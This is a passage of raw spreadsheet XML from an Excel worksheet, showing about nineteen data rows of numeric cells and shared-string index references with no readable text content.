        <v>26393</v>
      </c>
      <c r="H4107" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4107" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4107" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K4107" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4107" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4107" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4107" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4107" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4107" s="12" t="s">
        <v>26394</v>
      </c>
      <c r="Q4107" s="12">
        <v>3.9</v>
      </c>
      <c r="R4107" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4107" s="12" t="s">
        <v>26395</v>
      </c>
      <c r="T4107" s="12" t="s">
        <v>8568</v>
      </c>
      <c r="U4107" s="12" t="s">
        <v>26396</v>
      </c>
      <c r="V4107" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4107" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4107" s="12">
        <v>42</v>
      </c>
      <c r="Y4107" s="12" t="s">
        <v>26397</v>
      </c>
    </row>
    <row r="4108" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4108" s="12">
        <v>55471</v>
      </c>
      <c r="B4108" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4108" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4108" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F4108" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4108" s="12" t="s">
        <v>26398</v>
      </c>
      <c r="H4108" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4108" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J4108" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K4108" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4108" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4108" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4108" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4108" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4108" s="12" t="s">
        <v>26399</v>
      </c>
      <c r="Q4108" s="12">
        <v>3.8</v>
      </c>
      <c r="R4108" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4108" s="12" t="s">
        <v>26400</v>
      </c>
      <c r="T4108" s="12" t="s">
        <v>2339</v>
      </c>
      <c r="U4108" s="12" t="s">
        <v>26401</v>
      </c>
      <c r="V4108" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W4108" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4108" s="12">
        <v>14</v>
      </c>
      <c r="Y4108" s="12" t="s">
        <v>26402</v>
      </c>
    </row>
    <row r="4109" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4109" s="12">
        <v>55591</v>
      </c>
      <c r="B4109" s="12" t="s">
        <v>30187</v>
      </c>
      <c r="D4109" s="12" t="s">
        <v>30195</v>
      </c>
      <c r="F4109" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4109" s="12" t="s">
        <v>26403</v>
      </c>
      <c r="H4109" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4109" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4109" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K4109" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4109" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4109" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4109" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4109" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4109" s="12" t="s">
        <v>26404</v>
      </c>
      <c r="Q4109" s="12">
        <v>3.8</v>
      </c>
      <c r="R4109" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4109" s="12" t="s">
        <v>26405</v>
      </c>
      <c r="T4109" s="12" t="s">
        <v>26406</v>
      </c>
      <c r="U4109" s="12" t="s">
        <v>26407</v>
      </c>
      <c r="V4109" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W4109" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4109" s="12">
        <v>10</v>
      </c>
      <c r="Y4109" s="12" t="s">
        <v>26408</v>
      </c>
    </row>
    <row r="4110" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4110" s="12">
        <v>55911</v>
      </c>
      <c r="B4110" s="12" t="s">
        <v>30187</v>
      </c>
      <c r="D4110" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4110" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4110" s="12" t="s">
        <v>26415</v>
      </c>
      <c r="H4110" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4110" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4110" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K4110" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4110" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4110" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4110" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4110" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4110" s="12" t="s">
        <v>26416</v>
      </c>
      <c r="Q4110" s="12">
        <v>3.8</v>
      </c>
      <c r="R4110" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4110" s="12" t="s">
        <v>26417</v>
      </c>
      <c r="T4110" s="12" t="s">
        <v>26418</v>
      </c>
      <c r="U4110" s="12" t="s">
        <v>26419</v>
      </c>
      <c r="V4110" s="12" t="s">
        <v>15191</v>
      </c>
      <c r="W4110" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4110" s="12">
        <v>6</v>
      </c>
      <c r="Y4110" s="12" t="s">
        <v>26420</v>
      </c>
    </row>
    <row r="4111" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4111" s="12">
        <v>56291</v>
      </c>
      <c r="B4111" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4111" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4111" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4111" s="12" t="s">
        <v>26426</v>
      </c>
      <c r="H4111" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4111" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4111" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4111" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4111" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4111" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4111" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4111" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4111" s="12" t="s">
        <v>26427</v>
      </c>
      <c r="Q4111" s="12">
        <v>3.8</v>
      </c>
      <c r="R4111" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4111" s="12" t="s">
        <v>26428</v>
      </c>
      <c r="T4111" s="12" t="s">
        <v>26429</v>
      </c>
      <c r="U4111" s="12" t="s">
        <v>26430</v>
      </c>
      <c r="V4111" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4111" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4111" s="12">
        <v>12</v>
      </c>
      <c r="Y4111" s="12" t="s">
        <v>26431</v>
      </c>
    </row>
    <row r="4112" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4112" s="12">
        <v>56301</v>
      </c>
      <c r="B4112" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4112" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4112" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4112" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4112" s="12" t="s">
        <v>26432</v>
      </c>
      <c r="H4112" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4112" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4112" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4112" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4112" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4112" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4112" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4112" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4112" s="12" t="s">
        <v>26433</v>
      </c>
      <c r="Q4112" s="12">
        <v>3.9</v>
      </c>
      <c r="R4112" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4112" s="12" t="s">
        <v>26434</v>
      </c>
      <c r="T4112" s="12" t="s">
        <v>26435</v>
      </c>
      <c r="U4112" s="12" t="s">
        <v>26436</v>
      </c>
      <c r="V4112" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4112" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4112" s="12">
        <v>6</v>
      </c>
      <c r="Y4112" s="12" t="s">
        <v>26437</v>
      </c>
    </row>
    <row r="4113" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4113" s="12">
        <v>56581</v>
      </c>
      <c r="B4113" s="12" t="s">
        <v>30354</v>
      </c>
      <c r="C4113" s="12" t="s">
        <v>28414</v>
      </c>
      <c r="D4113" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4113" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F4113" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4113" s="12" t="s">
        <v>26439</v>
      </c>
      <c r="H4113" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4113" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4113" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4113" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4113" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4113" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4113" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4113" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4113" s="12">
        <v>3.14</v>
      </c>
      <c r="Q4113" s="12">
        <v>3.14</v>
      </c>
      <c r="R4113" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4113" s="12" t="s">
        <v>26440</v>
      </c>
      <c r="T4113" s="12" t="s">
        <v>26441</v>
      </c>
      <c r="U4113" s="12" t="s">
        <v>26442</v>
      </c>
      <c r="V4113" s="12" t="s">
        <v>26443</v>
      </c>
      <c r="W4113" s="12" t="s">
        <v>26444</v>
      </c>
      <c r="X4113" s="12">
        <v>186</v>
      </c>
      <c r="Y4113" s="12" t="s">
        <v>26445</v>
      </c>
    </row>
    <row r="4114" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4114" s="12">
        <v>56591</v>
      </c>
      <c r="B4114" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4114" s="12" t="s">
        <v>30906</v>
      </c>
      <c r="E4114" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4114" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4114" s="12" t="s">
        <v>26446</v>
      </c>
      <c r="H4114" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4114" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4114" s="12" t="s">
        <v>25003</v>
      </c>
      <c r="K4114" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4114" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4114" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4114" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4114" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4114" s="12" t="s">
        <v>26447</v>
      </c>
      <c r="Q4114" s="12">
        <v>3.7</v>
      </c>
      <c r="R4114" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4114" s="12" t="s">
        <v>26448</v>
      </c>
      <c r="T4114" s="12" t="s">
        <v>26449</v>
      </c>
      <c r="U4114" s="12" t="s">
        <v>26450</v>
      </c>
      <c r="V4114" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W4114" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4114" s="12">
        <v>34</v>
      </c>
      <c r="Y4114" s="12" t="s">
        <v>26451</v>
      </c>
    </row>
    <row r="4115" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4115" s="12">
        <v>56611</v>
      </c>
      <c r="B4115" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4115" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4115" s="12" t="s">
        <v>30466</v>
      </c>
      <c r="G4115" s="12" t="s">
        <v>26452</v>
      </c>
      <c r="H4115" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4115" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4115" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4115" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4115" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4115" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4115" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4115" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4115" s="12">
        <v>3.8</v>
      </c>
      <c r="Q4115" s="12">
        <v>3.8</v>
      </c>
      <c r="R4115" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4115" s="12" t="s">
        <v>26453</v>
      </c>
      <c r="T4115" s="12" t="s">
        <v>26454</v>
      </c>
      <c r="U4115" s="12" t="s">
        <v>26455</v>
      </c>
      <c r="V4115" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W4115" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4115" s="12">
        <v>2</v>
      </c>
      <c r="Y4115" s="12" t="s">
        <v>26456</v>
      </c>
    </row>
    <row r="4116" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4116" s="12">
        <v>56661</v>
      </c>
      <c r="B4116" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4116" s="12" t="s">
        <v>30779</v>
      </c>
      <c r="E4116" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4116" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4116" s="12" t="s">
        <v>26461</v>
      </c>
      <c r="H4116" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4116" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4116" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4116" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4116" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M4116" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N4116" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O4116" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4116" s="12" t="s">
        <v>4455</v>
      </c>
      <c r="Q4116" s="12">
        <v>3.1</v>
      </c>
      <c r="R4116" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4116" s="12" t="s">
        <v>26462</v>
      </c>
      <c r="T4116" s="12" t="s">
        <v>17790</v>
      </c>
      <c r="U4116" s="12" t="s">
        <v>26463</v>
      </c>
      <c r="V4116" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4116" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4116" s="12">
        <v>16</v>
      </c>
      <c r="Y4116" s="12" t="s">
        <v>26464</v>
      </c>
    </row>
    <row r="4117" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4117" s="12">
        <v>56691</v>
      </c>
      <c r="B4117" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4117" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4117" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4117" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4117" s="12" t="s">
        <v>26465</v>
      </c>
      <c r="H4117" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4117" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4117" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K4117" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4117" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4117" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4117" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4117" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4117" s="12" t="s">
        <v>26466</v>
      </c>
      <c r="Q4117" s="12">
        <v>3.9</v>
      </c>
      <c r="R4117" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4117" s="12" t="s">
        <v>26467</v>
      </c>
      <c r="T4117" s="12" t="s">
        <v>25979</v>
      </c>
      <c r="U4117" s="12" t="s">
        <v>26468</v>
      </c>
      <c r="V4117" s="12" t="s">
        <v>26469</v>
      </c>
      <c r="W4117" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4117" s="12">
        <v>10</v>
      </c>
      <c r="Y4117" s="12" t="s">
        <v>26470</v>
      </c>
    </row>
    <row r="4118" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4118" s="12">
        <v>56711</v>
      </c>
      <c r="B4118" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4118" s="12" t="s">
        <v>30437</v>
      </c>
      <c r="F4118" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4118" s="12" t="s">
        <v>26471</v>
      </c>
      <c r="H4118" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4118" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4118" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4118" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4118" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4118" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4118" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4118" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4118" s="12" t="s">
        <v>26264</v>
      </c>
      <c r="Q4118" s="12">
        <v>3.8</v>
      </c>
      <c r="R4118" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4118" s="12" t="s">
        <v>26472</v>
      </c>
      <c r="T4118" s="12" t="s">
        <v>26473</v>
      </c>
      <c r="U4118" s="12" t="s">
        <v>26474</v>
      </c>
      <c r="V4118" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4118" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4118" s="12">
        <v>31</v>
      </c>
      <c r="Y4118" s="12" t="s">
        <v>26475</v>
      </c>
    </row>
    <row r="4119" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4119" s="12">
        <v>56881</v>
      </c>
      <c r="B4119" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4119" s="12" t="s">
        <v>30356</v>
      </c>
      <c r="F4119" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4119" s="12" t="s">
        <v>26476</v>
      </c>
      <c r="H4119" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4119" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J4119" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4119" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4119" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4119" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4119" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4119" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4119" s="12" t="s">
        <v>26477</v>
      </c>
      <c r="Q4119" s="12">
        <v>3.5</v>
      </c>
      <c r="R4119" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4119" s="12" t="s">
        <v>26478</v>
      </c>
      <c r="T4119" s="12" t="s">
        <v>26479</v>
      </c>
      <c r="U4119" s="12" t="s">
        <v>26480</v>
      </c>
      <c r="V4119" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W4119" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4119" s="12">
        <v>19</v>
      </c>
      <c r="Y4119" s="12" t="s">
        <v>26481</v>
      </c>
    </row>
    <row r="4120" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4120" s="12">
        <v>56971</v>
      </c>
      <c r="B4120" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4120" s="12" t="s">
        <v>31155</v>
      </c>
      <c r="D4120" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4120" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4120" s="12" t="s">
        <v>26482</v>
      </c>
      <c r="H4120" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4120" s="12" t="s">
        <v>14196</v>
      </c>
      <c r="J4120" s="12" t="s">
        <v>14197</v>
      </c>
      <c r="K4120" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4120" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4120" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4120" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4120" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4120" s="12" t="s">
        <v>26483</v>
      </c>
      <c r="Q4120" s="12">
        <v>3.9</v>
      </c>
      <c r="R4120" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4120" s="12" t="s">
        <v>26484</v>
      </c>
      <c r="T4120" s="12" t="s">
        <v>25485</v>
      </c>
      <c r="U4120" s="12" t="s">
        <v>26485</v>
      </c>
      <c r="V4120" s="12" t="s">
        <v>14432</v>
      </c>
      <c r="W4120" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4120" s="12">
        <v>4</v>
      </c>
      <c r="Y4120" s="12" t="s">
        <v>26486</v>
      </c>
    </row>
    <row r="4121" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4121" s="12">
        <v>57071</v>
      </c>
      <c r="B4121" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D4121" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4121" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4121" s="12" t="s">
        <v>26487</v>
      </c>
      <c r="H4121" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4121" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4121" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K4121" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4121" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4121" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4121" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4121" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4121" s="12" t="s">
        <v>26230</v>
      </c>
      <c r="Q4121" s="12">
        <v>3.7</v>
      </c>
      <c r="R4121" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4121" s="12" t="s">
        <v>26488</v>
      </c>
      <c r="T4121" s="12" t="s">
        <v>26489</v>
      </c>
      <c r="U4121" s="12" t="s">
        <v>26490</v>
      </c>
      <c r="V4121" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W4121" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4121" s="12">
        <v>0</v>
      </c>
      <c r="Y4121" s="12" t="s">
        <v>26491</v>
      </c>
    </row>
    <row r="4122" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4122" s="12">
        <v>57101</v>
      </c>
      <c r="B4122" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C4122" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D4122" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4122" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F4122" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G4122" s="12" t="s">
        <v>26492</v>
      </c>
      <c r="H4122" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4122" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4122" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4122" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4122" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4122" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4122" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4122" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4122" s="12" t="s">
        <v>26493</v>
      </c>
      <c r="Q4122" s="12">
        <v>3.9</v>
      </c>
      <c r="R4122" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4122" s="12" t="s">
        <v>26494</v>
      </c>
      <c r="T4122" s="12" t="s">
        <v>26495</v>
      </c>
      <c r="U4122" s="12" t="s">
        <v>26496</v>
      </c>
      <c r="V4122" s="12" t="s">
        <v>3800</v>
      </c>
      <c r="W4122" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4122" s="12">
        <v>4</v>
      </c>
      <c r="Y4122" s="12" t="s">
        <v>26497</v>
      </c>
    </row>
    <row r="4123" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4123" s="12">
        <v>57371</v>
      </c>
      <c r="B4123" s="12" t="s">
        <v>30120</v>
      </c>
      <c r="D4123" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4123" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F4123" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4123" s="12" t="s">
        <v>26498</v>
      </c>
      <c r="H4123" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4123" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4123" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4123" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4123" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4123" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4123" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4123" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4123" s="12" t="s">
        <v>26499</v>
      </c>
      <c r="Q4123" s="12">
        <v>3.8</v>
      </c>
      <c r="R4123" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4123" s="12" t="s">
        <v>26500</v>
      </c>
      <c r="T4123" s="12" t="s">
        <v>26501</v>
      </c>
      <c r="U4123" s="12" t="s">
        <v>26502</v>
      </c>
      <c r="V4123" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W4123" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4123" s="12">
        <v>4</v>
      </c>
      <c r="Y4123" s="12" t="s">
        <v>26503</v>
      </c>
    </row>
    <row r="4124" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4124" s="12">
        <v>57381</v>
      </c>
      <c r="B4124" s="12" t="s">
        <v>30357</v>
      </c>
      <c r="C4124" s="12" t="s">
        <v>30358</v>
      </c>
      <c r="D4124" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4124" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4124" s="12" t="s">
        <v>26504</v>
      </c>
      <c r="H4124" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4124" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4124" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K4124" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4124" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4124" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4124" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4124" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4124" s="12" t="s">
        <v>26505</v>
      </c>
      <c r="Q4124" s="12">
        <v>3.8</v>
      </c>
      <c r="R4124" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4124" s="12" t="s">
        <v>26506</v>
      </c>
      <c r="T4124" s="12" t="s">
        <v>26507</v>
      </c>
      <c r="U4124" s="12" t="s">
        <v>26508</v>
      </c>
      <c r="V4124" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W4124" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4124" s="12">
        <v>22</v>
      </c>
      <c r="Y4124" s="12" t="s">
        <v>26509</v>
      </c>
    </row>
    <row r="4125" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4125" s="12">
        <v>57411</v>
      </c>
      <c r="B4125" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4125" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4125" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4125" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4125" s="12" t="s">
        <v>26510</v>
      </c>
      <c r="H4125" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4125" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4125" s="12" t="s">
        <v>23336</v>
      </c>
      <c r="K4125" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4125" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4125" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4125" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4125" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4125" s="12">
        <v>3.9</v>
      </c>
      <c r="Q4125" s="12">
